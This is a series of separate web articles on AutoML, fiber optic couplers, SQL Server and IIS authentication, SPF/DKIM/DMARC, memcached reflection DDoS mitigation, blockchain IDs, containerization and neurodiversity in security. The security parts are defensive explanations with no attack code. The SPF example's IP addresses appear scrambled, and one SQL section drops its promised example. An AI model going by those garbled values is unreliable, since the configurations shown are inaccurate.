Additionally, there are AutoML features that enable team members of different skill levels to now contribute to the data science pipeline. A data analyst without Python expertise could leverage a toolkit, like AutoAI on IBM Watson® Studio, to train a predictive model using the data they’re able to extract on their own via query. Using AutoML, a data analyst can now preprocess data, build a machine learning pipeline, and produce a fully trained model they can use for validating their own hypotheses without requiring a full data science team’s attention.
AutoML and IBM AutoAI
IBM researchers and developers contribute to the growth and development of AutoML. Ongoing product development with AutoAI on IBM Watson and the work of the IBM Researchers on Lale, an open-source automated data science library, are just some of the ways that IBM helps to create the next generation of AI approaches. While Lale is an open source project, it is actually core to many of AutoAI’s capabilities.
For data science teams who work with Python as the core of their ML stack, Lale offers a semi-automated library that integrates seamlessly within scikit-learn pipelines - different than auto-sklearn, or a library like TPOT. Lale goes beyond scikit-learn with automation, correctness checks, and interoperability. While based in the scikit-learn paradigm, it has increasing numbers of transformers and operators from other Python libraries and from libraries in languages such as Java and R.
AutoAI provides all of the elements of automated machine learning described above and more. Current AutoML capabilities automate only a small portion of the data scientist's and ML engineer's workloads. Watson Studio and AutoAI let a data science team quickly automate across the entire AI/ML lifecycle and experiment with solving business challenges. Teams can shorten their time to market for their predictive capabilities by starting with a set of prototype machine learning models. AutoAI in Watson Studio simplifies automated feature engineering, automated hyperparameter optimization, and machine learning model selection. Teams of data scientists and data analysts can evaluate their hypotheses quickly, and by the time they have certified the validity of their models they can already have deployed them to QA or production contexts.
If you or your team want to try AutoML for advanced data science practices, we can partner with you on your newest model building initiatives. Organizations have proven the value of rapidly prototyping model training, selection, and deployment. If you're just getting started, consider some of the tutorials and use cases on IBM Developer.
Autostrade per l’Italia
Autostrade per l’Italia implemented several IBM solutions for a complete digital transformation to improve how it monitors and maintains its vast array of infrastructure assets.
MANA Community teamed with IBM Garage to build an AI platform to mine huge volumes of environmental data volumes from multiple digital channels and thousands of sources. | <urn:uuid:ee311301-e942-4f50-8d38-25f17b3947fb> | CC-MAIN-2022-40 | https://www.ibm.com/cloud/learn/automl | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335362.18/warc/CC-MAIN-20220929163117-20220929193117-00002.warc.gz | en | 0.925832 | 2,050 | 2.765625 | 3 |
A fiber optic coupler is a device used in fiber optic systems with one or more input fibers and one or more output fibers, and it differs from WDM devices. A WDM multiplexer or demultiplexer separates light of different wavelengths into different channels, while a fiber optic coupler divides the optical power itself and sends it to different channels.
Most types of couplers work only in a limited range of wavelength (a limited bandwidth), since the coupling strength is wavelength-dependent (and often also polarization-dependent). This is a typical property of those couplers where the coupling occurs over a certain length. Typical bandwidths of fused couplers are a few tens of nanometers. In high-power fiber lasers and amplifiers, multimode fiber couplers are often used for combining the radiation of several laser diodes and sending them into inner cladding of the active fiber.
A basic fiber optic coupler has N input ports and M output ports, where N and M typically range from 1 to 64. N is the number of input ports (one or more); M is the number of output ports and is always equal to or greater than N. The number of input ports and output ports varies depending on the intended application for the coupler.
Light from an input fiber can appear at one or more outputs, with the power distribution potentially depending on the wavelength and polarization. Such couplers can be fabricated in different ways:
Some couplers use side-polished fibers, providing access to the fiber core;
Couplers can also be made from bulk optics, for example in the form of microlenses and beam splitters, which can be coupled to fibers (“fiber pig-tailed”).
Fiber optic couplers can either be passive or active devices. Passive fiber optic couplers are simple fiber optic components that are used to redirect light waves. Passive couplers either use micro-lenses, graded-refractive-index (GRIN) rods and beam splitters, optical mixers, or splice and fuse the core of the optical fibers together. Active fiber optic couplers require an external power source. They receive input signals, and then use a combination of fiber optic detectors, optical-to-electrical converters, and light sources to transmit fiber optic signals.
Types of fiber optic couplers include optical splitters, optical combiners, X couplers, star couplers, and tree couplers. The device allows the transmission of light waves through multiple paths.
Fused couplers are used to split optical signals between two fibers, or to combine optical signals from two fibers into one fiber. They are constructed by fusing and tapering two fibers together. This method provides a simple, rugged, and compact method of splitting and combining optical signals. Typical excess losses are as low as 0.2dB, while splitting ratios are accurate to within ±5 percent at the design wavelength. The devices are bi-directional, and offer low backreflection. The technique is best suited to singlemode and multimode couplers.
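To put those figures in perspective, here is a quick back-of-the-envelope calculation for an ideal 50:50 fused coupler with 0.2 dB excess loss (illustrative numbers only):

import math

p_in_mw = 1.0           # launch power in milliwatts
excess_loss_db = 0.2    # power dissipated inside the coupler
split_ratio = 0.5       # 50:50 coupler

total_out = p_in_mw * 10 ** (-excess_loss_db / 10)         # ~0.955 mW across both outputs
per_port = total_out * split_ratio                          # ~0.48 mW at each output port
insertion_loss_db = -10 * math.log10(per_port / p_in_mw)    # ~3.2 dB per port (3 dB split plus excess loss)

print(round(per_port, 3), "mW per port,", round(insertion_loss_db, 2), "dB insertion loss")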
Choices for fiber optic couplers also include single-window narrow-band, single-window wide-band, and dual-window wide-band devices. A single-window coupler is designed for one working wavelength, while a dual-window coupler is designed for two. For single-mode fiber, couplers are optimized for 1310 nm and 1550 nm; for multimode fiber, they are optimized for 850 nm and 1310 nm. | <urn:uuid:3f395b51-c78a-4360-96e8-d78b778059b0> | CC-MAIN-2022-40 | https://www.fiber-optic-tutorial.com/introduction-to-fiber-optic-couplers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337428.0/warc/CC-MAIN-20221003164901-20221003194901-00002.warc.gz | en | 0.912439 | 736 | 3.921875 | 4 |
A few weeks ago, we looked at monitoring
your Windows-based distributed applications and servers. Besides monitoring these applications once they’re running,
securing them and keeping them secure is equally important. So let’s look at some things a system administrator should
be aware of when configuring and running Windows-based distributed applications.
You’ll typically use one of two ways to secure access to part or all of an
application. You’ll either create a table of user names and passwords and
store that table in a database such as SQL Server, or you’ll use Windows
Active Directory (AD) or local SAM accounts for authentication.
Authenticating against a database
With user names and passwords stored in a database, the application requests the
username and password and validates this information against the user
table in the database. The browser sends the user’s credentials to an Active
Server Pages (ASP) script that processes them. The ASP script asks SQL
Server to look up the username and password to verify
the user. This method is typically used for internet or extranet
access, where the clients are from outside your organization or perhaps not members of your Windows domain.
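A minimal sketch of that lookup in Python with the pyodbc driver; the table, column names, and hashing scheme are hypothetical, and salted password hashes rather than plain-text passwords are assumed:

import hashlib
import pyodbc

def verify_user(conn, username, password):
    # Parameterized query: never concatenate user input into the SQL string
    row = conn.cursor().execute(
        "SELECT PasswordSalt, PasswordHash FROM AppUsers WHERE UserName = ?",
        username).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    candidate = hashlib.sha256(salt.encode("utf-8") + password.encode("utf-8")).hexdigest()
    return candidate == stored_hash

conn = pyodbc.connect("DRIVER={SQL Server};SERVER=dbserver;DATABASE=AppDb;Trusted_Connection=yes")
print(verify_user(conn, "jsmith", "correct horse battery staple"))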
With Windows Active Directory-based authentication or with local Security
Accounts Manager (SAM) authentication (i.e., no Windows domain account),
a user visits a Web page that contains an ASP script that tries to access SQL Server.
At that point, SQL Server reverifies the user’s security credentials with the
domain controller (DC) or with the local server’s SAM. This method is typically
used when clients who will be accessing your application are part of your organization.
If MS SQL is running on a server that’s a member of a domain, SQL Server will
first check the DC to authenticate a client. If not, SQL Server checks the local
server’s SAM. Using Active Directory is best because it
centralizes the user accounts and groups in one place where all of your
servers can access them. Another advantage is that users don’t need a
second username and password to access the application if the account with
which they’re logging on to their workstation is on the server or in the domain.
Other methods of Authentication
In addition to Windows integrated and basic authentication in IIS,
there are other methods of authenticating users who visit a Web site.
One thing you can do is map a client certificate to a local Windows or domain user
account. When users connect using that certificate, IIS (5.0 or later only) uses the mapped account
to log on the user and those account credentials are used to access resources.
Another alternative (again for Win2K or later and IIS 5.0 or later shops
only) is digest authentication. When you use digest authentication, the browser
creates a hashed version of the username and password along with
other information. These credentials can’t be easily deciphered, but the DC can match
the hashed information with the plaintext version stored on the DC. In this way, digest authentication
lets the browser and server authenticate the user without sending clear-text passwords. In order to use
digest authentication, the browser must be IE 5.5 or later, and the IIS server must be part
of an Active Directory domain.
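A simplified illustration of the hashing involved (the basic RFC 2617 digest calculation without the qop extensions; all values below are made up):

import hashlib

def md5_hex(value):
    return hashlib.md5(value.encode("utf-8")).hexdigest()

username, realm, password = "jsmith", "example.com", "s3cret"
method, uri = "GET", "/protected/default.asp"
nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093"   # issued by the server with each challenge

ha1 = md5_hex(f"{username}:{realm}:{password}")  # the secret half, never sent over the wire
ha2 = md5_hex(f"{method}:{uri}")
response = md5_hex(f"{ha1}:{nonce}:{ha2}")       # what the browser actually returns to the server

print(response)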
Authorization can be simply described as granting permissions to resources. This might mean granting ‘read’ or
‘read/write’ permissions to the accounts or groups you’ve configured authentication for. Typically these are applied
to the folder where the web-based portion of your application resides. It might mean configuring impersonation settings
in DCOM or ASP.NET
components, particularly if your users or clients are from outside your organization or are a mixture of internal and external users.
It also might mean configuring some very specific settings in SQL Server, which we’ll cover below.
The SQL Server side of things: Roles and permissions
Standard SQL Server Roles
You can set up a Windows user or group as a SQL Server login and then use that login in various ways. One way is to make the SQL Server login (The Windows user or group) part of a SQL Server role that has the necessary permissions
to the database. To add an existing login to a role, perform the following steps:
- Open Enterprise Manager.
- Open the Databases folder.
- Open the database to which you want to add the login.
- Select the Roles folder for the database.
- Right-click the role to which you want to add the login, and select Properties.
- Click Add, select the login to add, then click OK.
- Click OK to close the role properties and complete the action.
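The same change can be scripted rather than clicked through. Here is a hypothetical sketch using Python's pyodbc driver and the sp_addrolemember system stored procedure (server, database, and account names are placeholders):

import pyodbc

conn = pyodbc.connect(
    "DRIVER={SQL Server};SERVER=dbserver;DATABASE=Northwind;Trusted_Connection=yes",
    autocommit=True)
cursor = conn.cursor()

# Assumes the Windows group already has a login and access to this database
cursor.execute("EXEC sp_addrolemember N'db_datawriter', N'MYDOMAIN\\WebUsers'")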
To grant an account permissions on a specific stored procedure instead (the approach discussed under Stored Procedure Permissions below), the steps are similar:
- Open Enterprise Manager.
- Open the Databases folder.
- Open the database to which you want to add the permissions.
- Select the Stored Procedures folder for the database, then right-click the stored procedure you want to secure and select Properties.
- Click the Permissions button.
- Under the Users/Database Roles column, select the account you wish to grant permission to.
- Click the appropriate column (for instance ‘Exec’ to allow the account execute permissions on that stored procedure)
- Click OK twice to close the stored procedure properties and complete the action.
If you used these steps to add a login to the db_datareader and db_datawriter roles, for instance, SQL Server would now be able to authenticate users in that group and allow them to read data from and write data to the database you chose in step 3, above. That access comes from role membership rather than from permissions granted directly to the login, so the group keeps it for as long as it remains in the db_datareader and db_datawriter roles. However, the group would not be able to execute stored procedures or change the database design, because you haven’t granted those permissions. You could create another login and assign it to a role that provides more authority (such as db_owner).
Stored Procedure Permissions
If you need even more control over security than just letting a login
have access to an entire database, you can edit the role selections you
made when you created the login or add your own roles with custom
permissions. The roles you create can limit or grant access to specific
tables and even to specific columns.
Best practice in many application environments is to grant users or roles
permissions to the stored procedures that operate on a database,
rather than granting them direct access to the actual data:
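For example, a hypothetical sketch in which the procedure, table, and role names are placeholders and the statements are again run from Python with pyodbc:

import pyodbc

conn = pyodbc.connect(
    "DRIVER={SQL Server};SERVER=dbserver;DATABASE=Northwind;Trusted_Connection=yes",
    autocommit=True)
cursor = conn.cursor()

# Members of WebAppRole may call the procedure...
cursor.execute("GRANT EXECUTE ON dbo.usp_GetOrders TO WebAppRole")
# ...but have no direct access to the table the procedure reads
cursor.execute("DENY SELECT, INSERT, UPDATE, DELETE ON dbo.Orders TO WebAppRole")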
So now we’ve covered authentication and authorization in Windows-based distributed application environments. In Part II, we’ll cover some best practices for securing IIS and Microsoft SQL Server specifically. See you then! | <urn:uuid:9249fdef-2bf1-45c3-b959-9982d5854b93> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/os/secure-your-distributed-windows-apps/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337531.3/warc/CC-MAIN-20221005011205-20221005041205-00002.warc.gz | en | 0.848513 | 1,468 | 2.734375 | 3 |
The Simple Mail Transfer Protocol (SMTP) does not have any intrinsic methods of proving the authenticity, integrity, and confidentiality of individual messages. As such, it’s relatively easy for third parties to spoof the source of an email, to intercept and modify authentic email, and to monitor the contents of an email. In fact, anybody may claim to have sent an email from an arbitrary source domain.
Over the decades, multiple additional protocols have been developed in order to address these three basic weaknesses of email. Some serve to prove the identities of users of the email protocol (PGP/GPG or other public key cryptography based on individuals), while others are more focused on proving the authenticity and integrity of any email from a particular domain. In this article, we will explore three protocols of the latter category.
The SPF was developed to let domain owners explicitly state which hosts were allowed to send email from that domain. Email receivers may then use the SPF to ascertain the authenticity of an email by way of one or more Domain Name System (DNS) lookups. However, the SPF does not provide cryptographic assertions as to the authenticity of an email. It consists merely of a set of rules to match host names or IP addresses.
A domain may specify the SPF policies within a DNS TXT record, which will tend to look something like the following if the domain owner does not host their own mail servers:
"v=spf1 include:spf.protection.outlook.com -all"
Notice that the SPF policy entry starts with a header that specifies the SPF version (v=spf1), and is followed by a series of statements (or mechanisms) that specify the policy in left-to-right direction. The SPF recognizes eight such statements, which we’ll look into a bit further down. One of the two we see in the example above, include, merges another domain’s SPF policy with the owned domain. Its SPF policy is much longer, and itself includes two other domains recursively. Note that when specifying the SPF policy, the SPF proposed standard explicitly states that a maximum number of DNS lookups (usually 10) for the verifying party must be enforced. So take care not to nest too many SPF policies.
"v=spf1 ip4:184.108.40.206/26 ip4:220.127.116.11/24 ip4:18.104.22.168/24 ip4:22.214.171.124/24 ip4:126.96.36.199/23 ip4:188.8.131.52/24 ip4:184.108.40.206/24 ip4:220.127.116.11/24 include:spfa.protection.outlook.com -all"
Apart from include, SPF also recognizes the statements all, ip4, ip6, a, mx, ptr, and exists. The all statement is a catch-all statement and should only be used at the end of a policy. The statements ip4 and ip6 allow the specification of the IP addresses of hosts that are allowed to send email from the domain in question. The statements a and mx allow domain owners to specify a host name whose IP address(es) in the equivalent DNS record (A or MX) must match the source address of the email under scrutiny. The ptr statement requires a two-step DNS lookup (IP address ⇒ domain name ⇒ IP address) to result in equal IP addresses for a match. And, lastly, the exists statement requires that the specified domain name entry (A record) exist for a match. The big part here is that the exists statement allows macro expansions on the side of the verifying party.
The aforementioned statements may each be prefixed with one of the qualifiers + “Pass”, - “Fail”, ~ “SoftFail”, and ? “Neutral”, which change what qualifies as a match to the following statement. The qualifier - will cause the email to be refused completely upon rule match. The qualifier ~ will recommend to the evaluating party that an email is accepted, but categorized as SPAM. The qualifier ? will issue no recommendation to the evaluating party. If no qualifier is specified, + is assumed.
In addition to mechanisms and qualifiers, modifiers may be used to either redirect (or defer) to the authority of another domain, or to specify an exp-lanation for the denial of an email, which will be relayed to the recipient of the denied email. The latter modifier also allows macro expansions.
While the SPF does not provide cryptographic guarantees for the authenticity of email, DKIM does so by signing every legitimate outgoing email with a private key defined by the domain owner. In order to work, DKIM relies on two things: first, a DNS TXT record that will contain the public key for DKIM email validation, obtained from a DNS TXT record lookup of a name of the form [selector]._domainkey.example.com. Such a record will look something like the following:
"v=DKIM1; k=rsa; p=[Base64-encoded public key]"
Second, every authentic email sent by the domain in question will contain the header Dkim-Signature. Its value will contain at least 8 parameters that serve to specify the DKIM protocol version, the signature algorithm, what parts of the email were included in the signature, the aforementioned selector and domain to be queried for the DKIM public key, as well as the Base64-encoded cryptographic signature.
Thus, the DKIM protocol will allow email recipients’ servers to verify the authenticity and integrity of the signed parts of an email (note, that the body is not always signed). But because the DKIM protocol cannot be enforced, it does not protect against fraudulent email, and as such, the DKIM protocol should be used at least in conjunction with the SPF.
The DMARC protocol builds upon the SPF and DKIM by introducing the ability to monitor a domain for illegitimate email. In order for DMARC to work, both the SPF and DKIM must be set up. Akin to the SPF and DKIM, DMARC uses the DNS TXT record of the DNS name _dmarc.example.com to specify its policy:
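(The following record is illustrative only; the addresses and policy a real domain publishes will differ.)
"v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com; ruf=mailto:dmarc-failures@example.com"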
Apart from the protocol and version parameter, DMARC defines ten parameters in total. The parameter p specifies the policy for the domain with one of three values none, quarantine, and reject, which have similar functions to the SPF qualifiers ?, ~, and -. Specifying this parameter is necessary for DMARC to function. The parameter sp allows setting a distinct policy for subdomains. The parameters adkim and aspf allow changing how email from subdomains is treated when the DKIM or SPF policies were issued only for the organizational domain. The parameters rua and ruf specify where the DMARC reports should be sent to. The former address will receive aggregate reports, while the latter will receive detailed reports for each DMARC validation failure. The parameters fo, rf, and ri allow the fine-tuning of the behavior of the DMARC policy. Note too, that the parameter pct can be changed to allow domain owners to gradually enforce the DMARC policy.
| <urn:uuid:2b71f075-03a8-46a4-8539-3b665f53e748> | CC-MAIN-2022-40 | https://www.scip.ch/en/?labs.20171109 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337531.3/warc/CC-MAIN-20221005011205-20221005041205-00002.warc.gz | en | 0.877837 | 1,663 | 3.375 | 3 |
Memcached is a temporary data storage service used to improve the overall performance of a website by caching chunks of data in memory. If misconfigured, memcached listening on port 11211 (UDP and TCP) can be abused for reflection DoS attacks, in which an attacker sends a spoofed packet to the device and has the response reflected back at the victim.
Memcached allows access to cached data without any form of authentication, so an attacker can easily read the data in exposed caches and even modify it.
How to Fix:
- Bind the memcached server to a particular source IP only (see the example below this list).
- Don’t expose this service in the DMZ environment or over the Internet.
- Update ACLs and Firewalls to track or block UDP/TCP port 11211 for all ingress and egress traffic.
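For example, on a typical Linux installation the daemon options can restrict memcached to an internal interface and disable UDP entirely (option names may vary slightly between versions and distributions):

# /etc/memcached.conf (Debian/Ubuntu style; one option per line)
# Listen only on an internal interface, never 0.0.0.0
-l 10.0.0.12
# Disable the UDP listener abused in reflection attacks
-U 0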
More details at:
- US-CERT publication | <urn:uuid:84891a2b-8123-4242-91e9-99783c749fed> | CC-MAIN-2022-40 | https://www.btcirt.bt/the-memcached-reflectionamplification-ddos-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338244.64/warc/CC-MAIN-20221007175237-20221007205237-00002.warc.gz | en | 0.69703 | 294 | 2.71875 | 3 |
In most countries around the world, citizens carry identification for those times when it’s necessary to prove to an authority figure who they are. It can be something as simple as a trip to the post office to prove that they’re the intended package recipient, or urgent times like a hospital visit that requires the staff notify close family.
For business, the idea of an ID is important for paying taxes, complying with regulations and organizing finances. When traveling, countries have agreed on a system of passports so that legitimate foreign visitors can make themselves known. All these cases share a common thread. Authorities must be shown an internationally (and sometimes domestically) accepted ID.
Committing to a common form of identification like a passport, which is almost identical no matter which nationality you hold, is a straightforward way for the world’s authorities and governments to promote law and order.
Accountability, no matter where you are, is important. Physical IDs are crucial in this regard because they’re relatively difficult to forge, accurate and reasonably secure. However, innovative ideas about one’s digital identity are emerging that could change that. Partly due to some frightening events like the recent Equifax breach, in which hackers stole the personal identifying data of more than 150 million people, keeping one’s digital identity safe is a hot button issue. It’s also relevant because technology like blockchain is finding new ways to answer these hard questions.
How far can blockchain go?
For something as important as an identity, governments still need the ability to determine which modes of ID it deems authentic. Just as they agreed on the booklet format of a passport and the information included within, they must also do so for the next generation of IDs. Blockchain represents the most likely candidate to revolutionize the idea of identification, but there are some hurdles in its way.
Governments can hardly stop speculative blockchain solutions from investors who operate remotely and need no centralized authority, but crossing a physical border is a different issue entirely. Blockchain allows vast numbers of geographically distant users to consent to a single system, but can governments agree on which system they’ll accept? Support for a common blockchain system among regular people is easy to find, but getting governments to change policy accordingly is another story. Reaching international agreement on which blockchain people will use to identify themselves becomes a real issue.
The key to unlocking international blockchain IDs
There are already blockchain innovators discussing these important ideas between themselves.
New platforms such as SelfKey aim to answer any questions governments have when they inevitably come knocking. The company envisions a blockchain ecosystem with two crucial functions: the ability for people to register for an array of financial and civic services, and efforts to bring together the different jurisdictions that allow their citizens to register for those services. So far, people can use the KEY cryptocurrency to establish their irrefutable blockchain ID, and to register a new business, establish residency, buy international health insurance, start a new foundation or bank account, and more.
Many of these services are supported in jurisdictions around the world, so people can travel and have a universal ability to prove their status, no matter where they are.
“Citizenship in countries like Vanuatu and Grenada will be available for purchase to users of the SelfKey identity wallet immediately at launch. To streamline this process, we use a reusable KYC compliant identity wallet which will help all parties in the application process,” said Edmund John Lowell, founder of SelfKey.
Other platforms take a different approach to blockchain IDs, by using mobile technology and biometric identification (like the thumbprint login functionality on iPhones and some laptops). Regardless of how companies think that a self-sovereign ID will come about, all will require the help of governments to make it happen.
Can blockchain bypass governments?
One interesting idea to ponder is how a decentralized identity would work without government consent. Can citizens decide who is legitimate, even if the government doesn’t agree that they are? We are still too far from this reality to comprehend what such a world would require. The more realistic goal is to encourage governments, central banks, and other societal infrastructure to accept blockchain as a solution to some of their problems.
Thankfully, even for blockchain companies that aren’t thinking on such a big scale, it’s becoming more recognized that compliance with the status quo is necessary in driving change. As the two worlds collide, a better one will be born on the back of those who are only today sculpting their vision. | <urn:uuid:1bfbaad8-7d9a-437b-a178-c1cc3fa22dc1> | CC-MAIN-2022-40 | https://www.cio.com/article/227924/blockchain-ids-need-international-consensus.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338244.64/warc/CC-MAIN-20221007175237-20221007205237-00002.warc.gz | en | 0.949802 | 924 | 2.71875 | 3 |
Containerization is a technology that allows software developers to package software and applications in code and run them in isolated compute environments as immutable executable images. These containerized application images contain all the necessary files, configurations, libraries, and binaries needed to run that specific application. As a result, when a container is run, it depends only on the host OS kernel, thanks to containerization engines like Docker Engine that serve as the interface between the application runtime and the OS kernel.
This article is an overview of the role of application containerization in modern software deployments, including how containerization differs from virtualization at the OS level, the benefits of using containerization, and how to containerize an application.
Containerization vs. Virtualization (VMs)
Virtual machines are another kind of system isolation, but there are some major differences between virtual machines and application containers. Virtual machines are much more heavyweight than application containers. Also, because they’re designed to emulate entire systems, and not just single applications, they can take on workloads with higher resource requirements.
VMs emulate, or virtualize, an entire computer system, including the OS kernel, allowing for a single host machine to run one or more guest virtual machines. These guest virtual machines are managed by what is called a hypervisor, which runs on the host machine and coordinates both the filesystem and hardware resources of the host machine among the guest virtual machines.
What’s the advantage of allowing a host machine to run one or more virtual machines? The ability to host a variety of different workloads and use cases via multiple guest virtual machines on a single host machine gives organizations and cloud providers a lot of flexibility when it comes to resource utilization.
A large and powerful physical machine may require a certain portfolio of virtual machines one year, but as business needs change or architectures evolve, the ability to scale those infrastructure resources up or down and vary their properties without having to necessarily buy a new set of hardware is of huge value to both cloud providers and users managing their own data centers.
The Benefits of Containerizing Your Application
Developing software in containerized environments has several advantages over the more traditional software paradigm of only packaging application code and running it directly on the host system. Just as virtual machines provide flexibility and elastic scaling properties to cloud providers and data centers, leveraging containerization to package and run software applications can bring even more, and similar, advantages.
A containerized application, due to the fact that dependencies outside the container are minimal, can run reliably in different environments. One example where this is advantageous is the sidecar model in a microservice architecture. Here, a generalized function such as metrics collection or service registration runs as a process alongside a variety of different services. Containerization helps to encapsulate dependencies of this sidecar process, eliminating the need for the host to have those dependencies already installed. Consistency across development, staging, and production environments is another benefit of the portability of containerized applications.
Containerization Is Declarative
The ability to declaratively define application dependencies in code allows the application to have more control over its runtime environment. Applications that rely on host-installed packages may run into compatibility issues, unexpected runtime errors, and other problems, especially if the application needs to run in different environments or the host environment is otherwise unstable.
Developer Velocity and Portability
Running applications in isolated containers that encapsulate all the necessary dependencies eliminates a class of problems for developers by introducing a run-anywhere paradigm. Software packaged in this way is no longer coupled with the host OS, simplifying dependency management. The consistency of a containerized runtime in different environments can also benefit the development lifecycle, enabling software to be run reliably in development, staging, and production environments.
Fault Isolation and Security Controls
Because containerized applications are isolated at the process level, fatal crashes in one container will not affect other running containers. Containers can also integrate with host-level security policies, and virtualized resources provide isolation from physical host-level resources that can block malicious code from accessing the host system.
Container-specific configurations can also add security controls on top, limiting access to resources and enacting additional security policies. Still, containers in and of themselves are not a holistic defense from security threats, and the ability to compose multiple container images within a single container increases the surface area of security concerns when using images from third parties.
Resource and Server Efficiency
Application containers are more lightweight than virtual machines, since they leverage the host OS kernel and the resulting images only package what an application needs. This results in a lighter footprint and the ability to flexibly run multiple containers in a single compute environment, which leads to more efficient resource utilization.
Within a compute context, whether on a virtual machine, physical machine, or otherwise, many different application containers can and are run simultaneously and flexibly due to their properties of being portable and isolated. The use of virtual machines and containerization are not mutually exclusive, and in fact are often used together. A common industry pattern is for a cloud-native software organization to run their containerized applications on a cloud provider’s virtual machines.
The advent of platforms such as Kubernetes can further increase the server efficiencies of using application containers by decoupling and abstracting applications from the underlying infrastructure and federating the assignment of containers across clusters of servers. This allows for even more flexible resource optimization opportunities than at the virtual machine layer and simplifies infrastructure management for software developers.
How to Containerize an Application
The following is a general and simplified illustration of how to containerize a software application to provide a high-level overview of what a containerization workflow might look like.
The development lifecycle of a containerized application falls into roughly three phases.
When you develop the application and commit the source code, you define an application’s dependencies into a container image file, such as a Dockerfile. Traditional source code management is very compatible with the containerization model because all container configuration is stored as code, usually alongside the source code of the application. In some cases, for example if using Docker Engine, containerizing an existing application can be as simple as adding and configuring a Dockerfile and associated dependencies to the source code.
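As an illustration, a minimal (hypothetical) Dockerfile for a small Python web service might look like this:

FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Everything the service needs is declared above; only the host kernel is shared
CMD ["python", "app.py"]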
Here, you build and publish the image to a container repository, where it is immutable, versioned, and tagged. Once an application includes an image definition file such as a Dockerfile and is configured to install and pull required dependencies into an image, it’s time to materialize an image and store it. You can do this either locally or in a remote repository where it can be referenced and downloaded.
Lastly, you deploy and run the containerized application locally, in CI/CD pipelines or testing environments, in staging, or in a production environment. Once a published image is accessible by an environment, the image represents an executable that can then be run. Again using Docker Engine as an example, the target environment that will be running the container will need to have the Docker Daemon installed, which is a long-running service that manages the creation and running of the containerized processes. The Docker CLI provides an interface to manually or programmatically run the containerized application.
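Using Docker Engine as the example, the three phases map roughly onto three commands (registry, image name, tag, and port are placeholders):

docker build -t registry.example.com/team/myapp:1.0 .              # build the image from the Dockerfile
docker push registry.example.com/team/myapp:1.0                    # publish it to an image repository
docker run --rm -p 8080:8080 registry.example.com/team/myapp:1.0   # run it in any target environment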
There are many different containerization technologies and container orchestration methods and platforms to choose from, so each organization should do a thorough evaluation when selecting the technology they’d like to adopt. That being said, the Open Container Initiative, founded in part by the Docker team, works to define industry standards and specifications for container runtimes and images.
Containerization and Microservice Architecture
While there are advantages to operating monolithic services, such as uniform tooling, lower latencies for various operations, and simpler observability and deploys, many complex applications are being broken down into smaller pieces, or services, that interact with each other in what’s called a microservice architecture. How microservice architectures are designed and how monoliths are broken into microservices is a complex topic in and of itself, and outside the scope of this article. But it’s easy to see how application containerization becomes a very relevant and beneficial tool when deploying and hosting microservices.
A simple example: Imagine a monolithic application that serves web requests, processes those requests with business logic, and also maintains connections with the database layer. As the complexity of each layer grows over time, the business decides that it would be a good strategic move to separate this application into three separate services: a web service tier, a core logic API service, and a database service.
Now, instead of running large heavyweight processes in VMs, the organization decides to containerize these separate applications with very scoped and specific concerns. They even have a choice of either managing each specialized service in their own elastic clusters of virtual machines and scaling the number of containers in each VM, or using a platform like Kubernetes to abstract away the management of the infrastructure.
Is Containerization Right for You?
The developer-friendliness of modern containerization technologies like Docker make it an approachable technology to incorporate into a proof-of-concept. If it’s possible to introduce containerization into your software deployment cycle iteratively, such as containerizing a single service or a sidecar service, this may be a good way to gain operational experience with the technology and make a decision.
The choice to leverage containerization may or may not be simple, depending on the size and scale of your current organization. Introducing and adopting any new technology, however developer-friendly, requires an understanding of what benefits and what tradeoffs may be involved, especially where observability and security may be concerned.
That being said, there is a broad and growing community of developer support, and there are early indications that containerization is becoming more of an industry standard. Especially if your software is in the early stages or you’re working with a greenfield, leveraging containerization may be a good option and allow you to take advantage of some of the most modern technological advances in software development and deployment. | <urn:uuid:8863d637-6b96-474c-9977-bddc32a122f4> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/cloud-security/containerization/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00202.warc.gz | en | 0.9125 | 2,058 | 3.171875 | 3 |
The cybersecurity skills shortage and workforce gap continue to be of concern to organizations. As they seek to protect digital assets by finding professionals with the right skills, demand remains higher than supply.
With recent surveys suggesting the cybersecurity workforce gap decreased in 2020 from previous years — from 4 million worldwide in 2019 to 3.1 million in 2020 — 28% of CISOs firmly believe that "serious disruptions" will occur if these roles are not filled. Around 76% of CIOs and CISOs believe the answer to this shortage lies in a more diverse skill set among those tackling cybersecurity tasks. Additionally, a third of infosec professionals agree that neurodiversity will make cybersecurity defenses stronger while also helping to eliminate bias in the industry.
Defining Diversity and Neurodiversity
Diversity is nature's way of increasing its odds of survival. It's a fact that genetic diversity helps maintain a healthy population and build up resistance to diseases, while allowing it to adapt to change.
Neurodiversity is considered a natural genetic variation in the population and usually refers to the range of neurological differences in brain functions and behavioral traits, typically associated with social skills, learning ability, and mood. Commonly, individuals that diverge from the dominant societal standards of "normal" neurocognitive functioning are referred to as neurodivergent.
Since first introduced as a concept in the late '90s, neurodiversity has also become a social justice movement that seeks civil rights, equality, respect, and full societal inclusion for the neurodivergent. Regardless of the specific definition, the topic is typically associated with individuals that may be diagnosed with ADHD (attention deficit hyperactivity disorder) or on the autism spectrum and possess exceptional high pattern-recognition abilities, attention to detail, focus, and even outside-the-box thinking.
Diversity, including neurodiversity, in cybersecurity could improve an organizations' overall resilience to cyberattacks. Cybersecurity teams combining professionals with unique skill sets from different educational and social backgrounds, genders, ethnicities, and even with exceptional neurological abilities, can build the right pool of talent to tackle a wide range of cybersecurity challenges.
How Cybercriminals Leverage Diversity and Neurodiversity
